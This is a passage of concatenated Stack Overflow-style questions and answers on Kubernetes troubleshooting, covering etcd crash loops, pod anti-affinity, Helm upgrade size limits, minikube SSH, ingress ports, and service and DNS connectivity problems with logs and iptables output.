Dec 26 15:28:06 thalia0.domain oci-systemd-hook[9353]: systemdhook <debug>: 02cb55687848: Skipping as container command is etcd, not init or systemd
Dec 26 15:28:06 thalia0.domain oci-umount[9355]: umounthook <debug>: 02cb55687848: only runs in prestart stage, ignoring
Dec 26 15:28:07 thalia0.domain dockerd-current[1609]: time="2018-12-26T15:28:07.003175741-06:00" level=warning msg="02cb556878485b24e4705dd0efe1051c02f3e3bbbe7b8a7ab23ea71bd6d82b2f cleanup: failed to unmount secrets: invalid argument"
Dec 26 15:28:07 thalia0.domain kubelet[24604]: E1226 15:28:07.006714 24604 pod_workers.go:190] Error syncing pod 0264932236d6afef396f466fc3bd3181 ("etcd-thalia0.domain_kube-system(0264932236d6afef396f466fc3bd3181)"), skipping: failed to "StartContainer" for "etcd" with CrashLoopBackOff: "Back-off 2m40s restarting failed container=etcd pod=etcd-thalia0.domain_kube-system(0264932236d6afef396f466fc3bd3181)"
Dec 26 15:28:07 thalia0.domain kubelet[24604]: E1226 15:28:07.040361 24604 pod_workers.go:190] Error syncing pod 0264932236d6afef396f466fc3bd3181 ("etcd-thalia0.domain_kube-system(0264932236d6afef396f466fc3bd3181)"), skipping: failed to "StartContainer" for "etcd" with CrashLoopBackOff: "Back-off 2m40s restarting failed container=etcd pod=etcd-thalia0.domain_kube-system(0264932236d6afef396f466fc3bd3181)"
</code></pre>
<p>In order to cut down on the noise in the logs, I cordoned off the other nodes.</p>
<p>As noted, if I do a restart of the <code>kubelet</code> service, everything is fine for a while and then the intermittent behavior occurs. </p>
<p>Any suggestions would be most welcome. I am working with our sys admin and he said it appears that <code>etcd</code> is doing frequent restarts. I think trouble begins when the <code>CrashLoopBackOff</code> starts to happen.</p>
| <p>Actually appears to be a RHEL/Docker bug. See <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1655214" rel="nofollow noreferrer">Bug 1655214 - docker exec does not work with registry.access.redhat.com/rhel7:7.3</a></p>
<p>We've applied the fix, and so far things appear to be stable.</p>
|
<p>Basically, I need clarification if this is the right way to do: I am able to run sed command inside a container on a k8s pod. Now, the same sed I want to loop over for 10times but am not sure if this is working though I get no error from kubernetes pods or logs. Please confirm if my looping is good.</p>
<pre><code>'sed -i "s/\(training:\).*/\1 12/" ghav/default_sql.spec.txt &&
lant estimate -e dlav/lat/experiment_specs/default_sql.spec.txt -r /out'
</code></pre>
<p>I want to do this working command 10times inside the same container. is the below right?</p>
<pre><code>'for run in $(seq 1 10); do sed -i "s/\(training:\).*/\1 12/" ghav/default_sql.spec.txt &&
lant estimate -e dlav/lat/experiment_specs/default_sql.spec.txt -r /out; done'
</code></pre>
<p>the pod gets created and is running fine but am not sure how to confirm my loop is good and am doing that 10times...</p>
<p>inside pod describe I see below</p>
<pre><code>Args:
sh
-c
'for run in $(seq 1 10); do sed -i "s/\(training:\).*/\1 12/" ghav/default_sql.spec.txt &&
lant estimate -e dlav/lat/experiment_specs/default_sql.spec.txt -r /out; done'
</code></pre>
| <p>The "<a href="https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#run-a-command-in-a-shell" rel="nofollow noreferrer">Define a Command and Arguments for a Container</a>" does mention:</p>
<blockquote>
<p>To see the output of the command that ran in the container, view the logs from the Pod:</p>
<pre><code>kubectl logs command-demo
</code></pre>
</blockquote>
<p>So make sure that your command, for testing, does echo something, and check the pod logs.</p>
<pre><code>sh -c 'for run in $(seq 1 10); do echo "$run"; done'
</code></pre>
<p>As in:</p>
<pre><code>command: ["/bin/sh"]
args: ["-c", "for run in $(seq 1 10); do echo \"$run\"; done"]
</code></pre>
<p>(using <code>seq</code> here, as mentioned in <a href="https://github.com/kubernetes/kubernetes/issues/56631#issuecomment-348421974" rel="nofollow noreferrer">kubernetes issue 56631</a>)</p>
<p>For any complex sequence of commands, mixing quotes, it is best to wrap that sequence in a script <em>file</em>, and call that executable file 10 tiles.
The logs will confirm that the loop is executed 10 times.</p>
|
<p>We have a multi-node setup of our product where we need to deploy multiple Elasticsearch pods. As all these are data nodes and have volume mounts for persistent storage, we don't want to bring two pods up on the same node. I'm trying to use the anti-affinity feature of Kubernetes, but to no avail. </p>
<p>The cluster deployment is done through Rancher. We have 5 nodes in the cluster, and three nodes (let's say <code>node-1</code>, <code>node-2</code> <code>and node-3</code>) have the label <code>test.service.es-master: "true"</code>. So, when I deploy the helm chart and scale it up-to 3, Elasticsearch pods are up and running on all these three nodes. but if I scale it to 4, the 4th data node comes in one of the above mentioned nodes. Is that a correct behavior? My understanding was, imposing a strict anti-affinity should prevent the pods from coming up on the same node. I've referred to multiple blogs and forums (e.g. <a href="https://banzaicloud.com/blog/k8s-taints-tolerations-affinities/" rel="noreferrer">this</a> and <a href="https://medium.com/@betz.mark/herding-pods-taints-tolerations-and-affinity-in-kubernetes-2279cef1f982" rel="noreferrer">this</a>), and they suggest similar changes as mine. I'm attaching the relevant section of the helm chart. </p>
<p>The requirement is, we need to bring up ES on only those nodes which are labelled with specific key-value pair as mentioned above, and each of those nodes should only contain one pod. Any feedback is appreciated.</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
name: {{ .Values.service.name }}
namespace: default
spec:
clusterIP: None
ports:
...
selector:
test.service.es-master: "true"
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
name: {{ .Values.service.name }}
namespace: default
spec:
selector:
matchLabels:
test.service.es-master: "true"
serviceName: {{ .Values.service.name }}
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: test.service.es-master
operator: In
values:
- "true"
topologyKey: kubernetes.io/hostname
replicas: {{ .Values.replicaCount }}
template:
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
spec:
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: test.service.es-master
operator: In
values:
- "true"
topologyKey: kubernetes.io/hostname
securityContext:
...
volumes:
...
...
status: {}
</code></pre>
<p><strong>Update-1</strong></p>
<p>As per the suggestions in the comments and answers, I've added the anti-affinity section in template.spec. But unfortunately the issue still remains. The updated yaml looks like as follows:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
name: {{ .Values.service.name }}
namespace: default
spec:
clusterIP: None
ports:
- name: {{ .Values.service.httpport | quote }}
port: {{ .Values.service.httpport }}
targetPort: {{ .Values.service.httpport }}
- name: {{ .Values.service.tcpport | quote }}
port: {{ .Values.service.tcpport }}
targetPort: {{ .Values.service.tcpport }}
selector:
test.service.es-master: "true"
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
name: {{ .Values.service.name }}
namespace: default
spec:
selector:
matchLabels:
test.service.es-master: "true"
serviceName: {{ .Values.service.name }}
replicas: {{ .Values.replicaCount }}
template:
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
spec:
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: test.service.es-master
operator: In
values:
- "true"
topologyKey: kubernetes.io/hostname
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: test.service.es-master
operator: In
values:
- "true"
topologyKey: kubernetes.io/hostname
securityContext:
readOnlyRootFilesystem: false
volumes:
- name: elasticsearch-data-volume
hostPath:
path: /opt/ca/elasticsearch/data
initContainers:
- name: elasticsearch-data-volume
image: busybox
securityContext:
privileged: true
command: ["sh", "-c", "chown -R 1010:1010 /var/data/elasticsearch/nodes"]
volumeMounts:
- name: elasticsearch-data-volume
mountPath: /var/data/elasticsearch/nodes
containers:
- env:
{{- range $key, $val := .Values.data }}
- name: {{ $key }}
value: {{ $val | quote }}
{{- end}}
image: {{ .Values.image.registry }}/analytics/{{ .Values.image.repository }}:{{ .Values.image.tag }}
name: {{ .Values.service.name }}
ports:
- containerPort: {{ .Values.service.httpport }}
- containerPort: {{ .Values.service.tcpport }}
volumeMounts:
- name: elasticsearch-data-volume
mountPath: /var/data/elasticsearch/nodes
resources:
limits:
memory: {{ .Values.resources.limits.memory }}
requests:
memory: {{ .Values.resources.requests.memory }}
restartPolicy: Always
status: {}
</code></pre>
| <p>As Egor suggested, you need podAntiAffinity:</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: redis-cache
spec:
selector:
matchLabels:
app: store
replicas: 3
template:
metadata:
labels:
app: store
spec:
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- store
topologyKey: "kubernetes.io/hostname"
</code></pre>
<p>Source: <a href="https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#always-co-located-in-the-same-node" rel="nofollow noreferrer">https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#always-co-located-in-the-same-node</a></p>
<p>So, with your current label, it might look like this:</p>
<pre><code>spec:
affinity:
nodeAffinity:
# node affinity stuff here
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "test.service.es-master"
operator: In
values:
- "true"
topologyKey: "kubernetes.io/hostname"
</code></pre>
<p>Ensure that you put this in the correct place in your yaml, or else it won't work.</p>
|
<p>Is there any way using k8s or swarm or any other option to automate the spawn of containers according to requests.</p>
<p>Part of my project is to send an event to an eventbus (rabbitMQ) which has a listener to the events once an event arrives then start a new container for each message.</p>
<p>The only option I found was to mount the host engine to the event listener container that and I don't really like this solution.</p>
<p>I would like an orchestrator to "listen" to the eventbus or to any other request queue container spawn requests and start them.</p>
<p>Thank you</p>
| <p>This is a broad question, there are many ways on you can accomplish this.</p>
<p>For example:</p>
<ol>
<li><p>Write a simple bash script on an infinite loop that gets a message from RabbitMQ using another program (perhaps written <a href="https://www.rabbitmq.com/tutorials/tutorial-one-python.html" rel="nofollow noreferrer">python</a> with Pika). As soon as it gets a message, issue a <code>docker run ...</code></p></li>
<li><p>Write your own program with <a href="https://pika.readthedocs.io/en/stable/" rel="nofollow noreferrer">Pika</a> that waits for a message and then creates a pod in Kubernetes using the <a href="https://github.com/kubernetes-client/python" rel="nofollow noreferrer">python K8s client</a>.</p></li>
<li><p>You can also use any other language that has a client API for RabbitMQ, Docker, and/or Kubernetes.</p></li>
</ol>
|
<p>I am able to access the <code>nginx ingress controller</code> on the <code>NodePort</code>. My goal is to access the controller on <code>port 80</code>.</p>
<blockquote>
<p>Output of <code>kubectl -n ingress-nginx describe service/ingress-nginx</code></p>
</blockquote>
<pre><code>Name: ingress-nginx
Namespace: ingress-nginx
Labels: app.kubernetes.io/name=ingress-nginx
app.kubernetes.io/part-of=ingress-nginx
Annotations: kubectl.kubernetes.io/last-applied-configuration:
{"apiVersion":"v1","kind":"Service","metadata":{"annotations":{},"labels":{"app.kubernetes.io/name":"ingress-nginx","app.kubernetes.io/par...
Selector: app.kubernetes.io/name=ingress-nginx,app.kubernetes.io/part-of=ingress-nginx
Type: NodePort
IP: 10.100.48.223
Port: http 80/TCP
TargetPort: 80/TCP
NodePort: http 30734/TCP
Endpoints: 192.168.0.8:80
Port: https 443/TCP
TargetPort: 443/TCP
NodePort: https 32609/TCP
Endpoints: 192.168.0.8:443
Session Affinity: None
External Traffic Policy: Cluster
Events: <none>
</code></pre>
<p>I have few ideas of solving that problem:</p>
<ul>
<li>redirect traffinc incoming on port 30734 to port 80 via <code>iptables</code></li>
<li>resize the range for nodeports so port 80 can be a nodeport as well</li>
</ul>
<p>I am not sure if these are common ways to do this, so I'd love to hear how you usually deal with this. Probably there is another component necessary?</p>
| <p>The normal way to handle this is with a LoadBalancer mode service which puts a cloud load balancer in front of the existing NodePort so that you can remap the normal ports back onto it.</p>
|
<p>I am trying to start Kubernetes minikube (v0.32.0) using kvm on Ubuntu 18.04 following the </p>
<blockquote>
<p><a href="https://kubernetes.io/docs/setup/minikube/" rel="nofollow noreferrer">https://kubernetes.io/docs/setup/minikube/</a></p>
</blockquote>
<p>However, it hangs while running:
<code>minikube start --vm-driver kvm2 -v 10</code> or <code>minikube ssh -v 10</code> with</p>
<p><code>Error dialing TCP: ssh: handshake failed: ssh: unable to authenticate, attempted methods [none publickey], no supported methods remain</code>. </p>
<p>I can connect to minikube VM with "ssh [email protected]", so I believe <code>minikube ssh</code> does not work because it does not use the same parameters. How do I configure it to do it?</p>
<ul>
<li>I did manage to login to minikube through kvm front-end using docker/tcuser and copy my public ssh key but it did not help.</li>
<li>My ~/.minikube/machines/minikube/config.json for authentication is:</li>
</ul>
<blockquote>
<pre><code>"AuthOptions": {
"CertDir": "/home/badgers/.minikube",
"CaCertPath": "/home/badgers/.minikube/certs/ca.pem",
"CaPrivateKeyPath": "/home/badgers/.minikube/certs/ca-key.pem",
"CaCertRemotePath": "",
"ServerCertPath": "/home/badgers/.minikube/machines/server.pem",
"ServerKeyPath": "/home/badgers/.minikube/machines/server-key.pem",
"ClientKeyPath": "/home/badgers/.minikube/certs/key.pem",
"ServerCertRemotePath": "",
"ServerKeyRemotePath": "",
"ClientCertPath": "/home/badgers/.minikube/certs/cert.pem",
"ServerCertSANs": null,
"StorePath": "/home/badgers/.minikube"
</code></pre>
</blockquote>
| <p>Is your VM really starting? Are you running on bare metal or nested virtualization? Generally, your ssh private key to connect to the VM will be under:</p>
<pre><code>/home/badgers/.minikube/machines/minikube/id_rsa
</code></pre>
<p>You can check it with:</p>
<pre><code>$ minikube ssh-key
</code></pre>
<p>This is also identified by the <code>SSHKeyPath</code> option in your config:</p>
<pre><code>{
"ConfigVersion": 3,
"Driver": {
"IPAddress": "192.168.x.x",
"MachineName": "minikube",
"SSHUser": "docker",
"SSHPort": 22,
"SSHKeyPath": "/home/badgers/.minikube/machines/minikube/id_rsa",
...
}
</code></pre>
|
<p>I was using the <code>helm upgrade -i xxx myfoo</code> to install/upgrade myfoo, </p>
<p>I follow all the standard doc, but this failure ALWAYS happend as soon as I upgrade at the 7th upgration!</p>
<p>When I began to upgrade at the 7th time, it told me below failure:</p>
<p><code>Error: UPGRADE FAILED: ConfigMap "myfoo.v7" is invalid: []: Too long: must have at most 1048576 characters</code></p>
<p>This is really frustrating! Why do this happen? </p>
| <p>Thank you for your help, I now understand what's going on.</p>
<p>I added some bigger file in <code>chart/</code> dir, which cause the helm package size exceed 1M.</p>
<p>after remove these bigger files, it works back to normal. And I know why there is .helmignore file now, it is used to tell helm not include them in final helm package file(*.tgz)</p>
|
<p>Step1:finish installing etcd and kubernetes with YUM in CentOS7 and shutdown firewall</p>
<p>Step2:modify related configuration item in /etc/sysconfig/docker</p>
<blockquote>
<p>OPTIONS='--selinux-enabled=false --insecure-registry gcr.io'</p>
</blockquote>
<p>Step3:modify related configuration item in /etc/kubernetes/apiserver</p>
<p>remove </p>
<blockquote>
<p>ServiceAccount</p>
</blockquote>
<p>in KUBE_ADMISSION_CONTROL configuration item</p>
<p>Step4:start all the related services of etcd and kubernetes</p>
<p>Step5:start ReplicationController for mysql db</p>
<blockquote>
<p>kubectl create -f mysql-rc.yaml</p>
</blockquote>
<pre><code>apiVersion: v1
kind: ReplicationController
metadata:
name: mysql
spec:
replicas: 1
selector:
app: mysql
template:
metadata:
labels:
app: mysql
spec:
containers:
- name: mysql
image: hub.c.163.com/library/mysql
ports:
- containerPort: 3306
env:
- name: MYSQL_ROOT_PASSWORD
value: "123456"
</code></pre>
<p>Step6:start related mysql db service</p>
<blockquote>
<p>kubectl create -f mysql-svc.yaml</p>
</blockquote>
<pre><code>kind: Service
metadata:
name: mysql
spec:
ports:
- port: 3306
selector:
app: mysql
</code></pre>
<p>Step7:start ReplicationController for myweb</p>
<blockquote>
<p>kubectl create -f myweb-rc.yaml</p>
</blockquote>
<pre><code>apiVersion: v1
kind: ReplicationController
metadata:
name: myweb
spec:
replicas: 3
selector:
app: myweb
template:
metadata:
labels:
app: myweb
spec:
containers:
- name: myweb
image: docker.io/kubeguide/tomcat-app:v1
ports:
- containerPort: 8080
env:
- name: MYSQL_SERVICE_HOST
value: "mysql"
- name: MYSQL_SERVICE_PORT
value: "3306"
</code></pre>
<p>Step8:start related tomcat service</p>
<blockquote>
<p>kubectl create -f myweb-svc.yaml</p>
</blockquote>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: myweb
spec:
type: NodePort
ports:
- port: 8080
nodePort: 30001
selector:
app: myweb
</code></pre>
<p>When I visit from browser with nodeport(30001),I get the following Exception:</p>
<blockquote>
<p>Error:com.mysql.jdbc.exceptions.jdbc4.CommunicationsException:
Communications link failure The last packet sent successfully to the
server was 0 milliseconds ago. The driver has not received any packets
from the server.</p>
</blockquote>
<hr>
<blockquote>
<p>kubectl get ep</p>
</blockquote>
<pre><code>NAME ENDPOINTS AGE
kubernetes 192.168.57.129:6443 1d
mysql 172.17.0.2:3306 1d
myweb 172.17.0.3:8080,172.17.0.4:8080,172.17.0.5:8080 1d
</code></pre>
<blockquote>
<p>kubectl get svc</p>
</blockquote>
<pre><code>NAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes 10.254.0.1 <none> 443/TCP 1d
mysql 10.254.0.5 <none> 3306/TCP 1d
myweb 10.254.220.2 <nodes> 8080:30001/TCP 1d
</code></pre>
<p>From the interior of any tomcat container I can see the mysql env and the related mysql link code in JSP is as below:</p>
<pre><code>Class.forName("com.mysql.jdbc.Driver");
String ip=System.getenv("MYSQL_SERVICE_HOST");
String port=System.getenv("MYSQL_SERVICE_PORT");
ip=(ip==null)?"localhost":ip;
port=(port==null)?"3306":port;
System.out.println("Connecting to database...");
conn = java.sql.DriverManager.getConnection("jdbc:mysql://"+ip+":"+port+"?useUnicode=true&characterEncoding=UTF-8", "root","123456");
</code></pre>
<p>[root@promote ~]# docker exec -it 1470cfaa1b1c /bin/bash</p>
<p>root@myweb-xswfb:/usr/local/tomcat# env |grep MYSQL_SERVICE </p>
<p>MYSQL_SERVICE_PORT=3306</p>
<p>MYSQL_SERVICE_HOST=mysql</p>
<p>root@myweb-xswfb:/usr/local/tomcat# ping mysql</p>
<p>ping: unknown host</p>
<p><strong>Can someone tell me why I could not ping mysqldb hostname from inner tomcat server?Or how to locate the problem further?</strong></p>
<p><a href="https://i.stack.imgur.com/miZ1h.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/miZ1h.png" alt="enter image description here"></a></p>
| <p>I know the reason, it's the DNS problems. The web server cannot find the IP address of the mysql server. so it failed. Temp solution is change the web server's IP to the mysql db server. Hope can help you. Thank you. </p>
<p><a href="https://i.stack.imgur.com/IWOkt.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/IWOkt.png" alt="enter image description here"></a>
<a href="https://i.stack.imgur.com/26NSX.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/26NSX.png" alt="enter image description here"></a>
<a href="https://i.stack.imgur.com/zEQ1V.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/zEQ1V.png" alt="enter image description here"></a></p>
|
<p>I setup a single node kubernetes following the <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/1.12.0/docs/08-bootstrapping-kubernetes-controllers.md" rel="nofollow noreferrer">kubernetes-the-hard-way guide</a>, except that I'm running on CentOS-7 and I deploy one master and one worker in the same node. I already turn off the firewalld service.</p>
<p>After the installation, I deploy a mongodb service, however the cluster IP is not accessible but the endpoint is accessible. The service detail is as follows:</p>
<pre><code>$ kubectl get svc
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.254.0.1 <none> 443/TCP 2m
mongodb ClusterIP 10.254.0.117 <none> 27017/TCP 55s
$ kubectl describe svc mongodb
Name: mongodb
Namespace: default
Labels: io.kompose.service=mongodb
Annotations: kompose.cmd=kompose convert -f docker-compose.yml
kompose.version=1.11.0 (39ad614)
kubectl.kubernetes.io/last-applied-configuration=
{"apiVersion":"v1","kind":"Service","metadata":{"annotations":
{"kompose.cmd":"kompose convert -f docker-compose.yml","kompose.version":"1.11.0
(39ad614...
Selector: io.kompose.service=mongodb
Type: ClusterIP
IP: 10.254.0.117
Port: 27017 27017/TCP
TargetPort: 27017/TCP
Endpoints: 10.254.0.2:27017
Session Affinity: None
Events: <none>
</code></pre>
<p>I run mongo 10.254.0.2 on the host, it works, but when I run mongo 10.254.0.117, it does not works. By the way, if I start another mongo pod for example</p>
<pre><code>kubectl run mongo-shell -ti --image=mongo --restart=Never bash
</code></pre>
<p>and I tried mongo 10.254.0.2 and mongo 10.254.0.117, they did not work at all.</p>
<p>The kubernetes version I use is 1.10.0.</p>
<p>I think this is a kube-proxy issue, the kube-proxy is configured as follows:</p>
<pre><code>[Unit]
Description=Kubernetes Kube-Proxy Server
Documentation=https://kubernetes.io/docs/concepts/overview/components/#kube-
proxy https://kubernetes.io/docs/reference/generated/kube-proxy/
After=network.target
[Service]
ExecStart=/usr/local/bin/kube-proxy \
--config=/var/lib/kubelet/kube-proxy-config.yaml \
--logtostderr=true \
--v=2
Restart=on-failure
RestartSec=5
LimitNOFILE=65536
[Install]
WantedBy=multi-user.target
</code></pre>
<p>and the config file is</p>
<pre><code>kind: KubeProxyConfiguration
apiVersion: kubeproxy.config.k8s.io/v1alpha1
clientConnection:
kubeconfig: "/var/lib/kubelet/kube-proxy.kubeconfig"
mode: "iptables"
clusterCIDR: "10.254.0.0/16"
</code></pre>
<p>This is the ip tables I get</p>
<pre><code>sudo iptables -t nat -nL
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
DOCKER all -- 0.0.0.0/0 0.0.0.0/0 ADDRTYPE match dst-type LOCAL
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
DOCKER all -- 0.0.0.0/0 !127.0.0.0/8 ADDRTYPE match dst-type LOCAL
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */
MASQUERADE all -- 172.17.0.0/16 0.0.0.0/0
CNI-0f56c935ec75c77eb189a5fe all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "a54a2f20dbe5d24ec4fb6b059f23aae392cc26853cf2b474a56dff2a2f2d6bb6" */
CNI-d2a650ff06e253010ea31f3d all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "f3252d60a15faa5ff6c4b2aabebdb47aa5652e12c9d874f538b33d6c5913ba47" */
CNI-34b02c799f7bc4e979c15266 all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "5a87d86a62dd299e1d36b2ccd631d58896f2724ad9b4e14a93b9dfaa162b09e3" */
CNI-eb80e2736e1009010a27b4b4 all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "1891a61e27b764e4a36717166a2b83ce7d2baa5258e54f0ea183c4433b04de38" */
CNI-4d1b80b0072ade1be68c43d1 all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "2b90e720350fa78bf6e6756b941526bf181e0b48c6b87207bbc8f097933e67ba" */
CNI-7699fcd0ab82a702bac28bc9 all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "3feed2ec479bd17f82cac60adfd1c79c81d4c53d536daa74a46e05f462e2d895" */
CNI-871343dd2a1a9738c94b4dba all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "1a3a7b27889e54494d1e9699efb158dc8f3bb85b147b80db84038c07fd4c9910" */
CNI-3c0d02d02e5aa29b38ada7ba all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "cdd5d6cf1a772b2acd37471046f53d0aa635733f0d5447a11d76dbb2ee216378" */
Chain CNI-0f56c935ec75c77eb189a5fe (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "a54a2f20dbe5d24ec4fb6b059f23aae392cc26853cf2b474a56dff2a2f2d6bb6" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "a54a2f20dbe5d24ec4fb6b059f23aae392cc26853cf2b474a56dff2a2f2d6bb6" */
Chain CNI-34b02c799f7bc4e979c15266 (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "5a87d86a62dd299e1d36b2ccd631d58896f2724ad9b4e14a93b9dfaa162b09e3" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "5a87d86a62dd299e1d36b2ccd631d58896f2724ad9b4e14a93b9dfaa162b09e3" */
Chain CNI-3c0d02d02e5aa29b38ada7ba (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "cdd5d6cf1a772b2acd37471046f53d0aa635733f0d5447a11d76dbb2ee216378" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "cdd5d6cf1a772b2acd37471046f53d0aa635733f0d5447a11d76dbb2ee216378" */
Chain CNI-4d1b80b0072ade1be68c43d1 (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "2b90e720350fa78bf6e6756b941526bf181e0b48c6b87207bbc8f097933e67ba" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "2b90e720350fa78bf6e6756b941526bf181e0b48c6b87207bbc8f097933e67ba" */
Chain CNI-7699fcd0ab82a702bac28bc9 (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "3feed2ec479bd17f82cac60adfd1c79c81d4c53d536daa74a46e05f462e2d895" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "3feed2ec479bd17f82cac60adfd1c79c81d4c53d536daa74a46e05f462e2d895" */
Chain CNI-871343dd2a1a9738c94b4dba (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "1a3a7b27889e54494d1e9699efb158dc8f3bb85b147b80db84038c07fd4c9910" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "1a3a7b27889e54494d1e9699efb158dc8f3bb85b147b80db84038c07fd4c9910" */
Chain CNI-d2a650ff06e253010ea31f3d (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "f3252d60a15faa5ff6c4b2aabebdb47aa5652e12c9d874f538b33d6c5913ba47" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "f3252d60a15faa5ff6c4b2aabebdb47aa5652e12c9d874f538b33d6c5913ba47" */
Chain CNI-eb80e2736e1009010a27b4b4 (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "1891a61e27b764e4a36717166a2b83ce7d2baa5258e54f0ea183c4433b04de38" */
MASQUERADE all -- 0.0.0.0/0 !224.0.0.0/4 /* name: "bridge" id: "1891a61e27b764e4a36717166a2b83ce7d2baa5258e54f0ea183c4433b04de38" */
Chain DOCKER (2 references)
target prot opt source destination
RETURN all -- 0.0.0.0/0 0.0.0.0/0
Chain KUBE-MARK-DROP (0 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x8000
Chain KUBE-MARK-MASQ (4 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000
Chain KUBE-NODEPORTS (1 references)
target prot opt source destination
Chain KUBE-POSTROUTING (1 references)
target prot opt source destination
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000
Chain KUBE-SEP-G5V522HWZT6RKRAC (2 references)
target prot opt source destination
KUBE-MARK-MASQ all -- 192.168.56.3 0.0.0.0/0 /* default/kubernetes:https */
DNAT tcp -- 0.0.0.0/0 0.0.0.0/0 /* default/kubernetes:https */ recent: SET name: KUBE-SEP-G5V522HWZT6RKRAC side: source mask: 255.255.255.255 tcp to:192.168.56.3:6443
Chain KUBE-SEP-O34O4OGFBAADOMEG (1 references)
target prot opt source destination
KUBE-MARK-MASQ all -- 10.254.0.2 0.0.0.0/0 /* default/mongodb:27017 */
DNAT tcp -- 0.0.0.0/0 0.0.0.0/0 /* default/mongodb:27017 */ tcp to:10.254.0.2:27017
Chain KUBE-SERVICES (2 references)
target prot opt source destination
KUBE-MARK-MASQ tcp -- !10.254.0.0/16 10.254.0.1 /* default/kubernetes:https cluster IP */ tcp dpt:443
KUBE-SVC-NPX46M4PTMTKRN6Y tcp -- 0.0.0.0/0 10.254.0.1 /* default/kubernetes:https cluster IP */ tcp dpt:443
KUBE-MARK-MASQ tcp -- !10.254.0.0/16 10.254.0.117 /* default/mongodb:27017 cluster IP */ tcp dpt:27017
KUBE-SVC-ZDG6MRTNE2LQFT34 tcp -- 0.0.0.0/0 10.254.0.117 /* default/mongodb:27017 cluster IP */ tcp dpt:27017
KUBE-NODEPORTS all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service nodeports; NOTE: this must be the last rule in this chain */ ADDRTYPE match dst-type LOCAL
Chain KUBE-SVC-NPX46M4PTMTKRN6Y (1 references)
target prot opt source destination
